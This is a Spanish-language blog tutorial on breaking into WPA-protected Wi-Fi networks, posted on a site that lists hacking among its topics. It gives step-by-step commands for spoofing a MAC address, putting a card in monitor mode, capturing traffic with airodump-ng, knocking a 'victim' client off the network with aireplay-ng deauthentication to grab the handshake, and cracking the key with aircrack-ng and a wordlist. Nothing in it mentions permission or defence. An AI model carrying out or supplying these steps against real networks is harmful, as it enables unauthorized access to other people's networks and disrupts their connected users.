wpa wifiway by Lilo - Electronik-Pro, Informatica, Noticas,Wordpress,Facebook,Hacking,Programas,Hosting,Dominios

eh esto leeyendo y no ehvisto ningun tuto de hacking wpa y todos preguntanpor eso. eh respondido varios temas como bien venida les eh escho este post que tenia en mi foro. leean con antencion

Tratare de explicar el hackeo de una red, inalambrica Wifi. con seguridad (wpa)

Bueno lo primero que devemos saber es, que esta encryptacion no necesita datas ni ivs. cuenta de un buen diccionario.

Primera entendamos un poco.
El diccionario lo podemos descargar en el se encuentran palabras millones de palabras. multiilenguajes. etc.

Cada uno de nosotros podemos armar un diccionario con todas las palabras que deseomos. Pero queda claro decir que no existe ningun diccionario con tu propia /o pass.

TAl diccionario no existe.

TAmbien devemos tener encuenta que deve de haber clientes conectados. al AP De echo no se podra. Empesemos.

Lo primero es. cambiar la direccion mac de nuestra tarjeta.
Antes devemos dar de baja en interfas Wlan0 cabiar por el sullo.

ifconfig wlan0 down dado de baja

macchanger -m 00:11:22:33:44:55 wlan0 nos aparecera el cambio de la mac.

Reaccion.

Imagen

Echo esto ya tenemos nuestra mac falsa.
lo siguiente sera poner dar de alta la tarjeta o el interfas.

ifconfig wlan0 up

Reaccion.

Imagen

Ahora a que ponerla en modo monitor podemos hacerlo con airmon-ng o con este simple comando.

iwconfig wlan0 mode monitor

Reaccion.

Imagen

Como vemos no nos ah marcado error ni nada prosigamos.

Escanearemos canales en busca de redes. wpa con cliente. Usaremos airodump-ng

airodump-ng wlan0

Reaccion.

Imagen

Una vez localizado el AP presionamos control c para detener la accion de la shell.
tomamos encuenta la mac del AP y la mac del cliente

Capturamos trafico del canal con airodump-ng

airodump-ng --bssidMac_ap -cCanal -w Nombre_del_fichero wlan0

airodump-ng --bssid 00:14:95:xx:xx -c6 -w handshake wlan0


Reaccion.

Imagen

Como vemos en la imagen de la Shell de lado superior derecho No emos conseguido, aun el handshake, necesitamos hacer un A0
Desauntentificar al cliente conectado al AP, desconectarlo y cuando el cliente reconecte. tendremos nuestro handshake.
EL HANDSHAKE es como un saludo un simple apreton de manos. tomenlo en cuenta como eso

Usamos aireplay-ng A0


aireplay-ng -0 20 -a MAC_AP -c MAC_CLIENTE wlan0

aireplay-ng -0 20 -a 00:14:95:xx:xx -c 00:0f:cb:xx:xx wlan0


Reaccion.

Imagen

Mientras tanto lo que paso en la pc de la victima. Cliente

El cliente fue descoenctado y reconecto.

Imagen

Bueno ya que obtuvimos el handshake.

Solo falta verificar si si lo tenemos. usaremos aircrack-ng para verrificar

aircrack-ng /root/swireless/archivo.cap

aircrack-ng /root/swireless/handshake.cap


Reaccion.

Imagen

Como vemos todo a salido bien


aircrack-ng /root/swireless/archivo.cap -w /root/swireless/wordlist/nombre_del_diccionario:txt

SE me olvidaba algo el diccionario deve de ir en la ruta /root/swireless/wordlist. y deve ser renombrado a diccionario.txt

aircrack-ng /root/swireless/handshake.cap -w /root/swireless/wordlist/diccionario.txt

Solo falta pasarle aircrack-ng con diccionario al handshake y listo

Imagen

Una vez echo eso reaccionaara asi encontrando la key :P :P

Reaccion.

Imagen

Espero les aya gustado. esta muy resumido. y muy explicado Gracias.

funciona con bakctrack para otros usuarios recomeindo que usen wifiway antes que backtrack

Saludos

0 comentarios:

Publicar un comentario

 
Top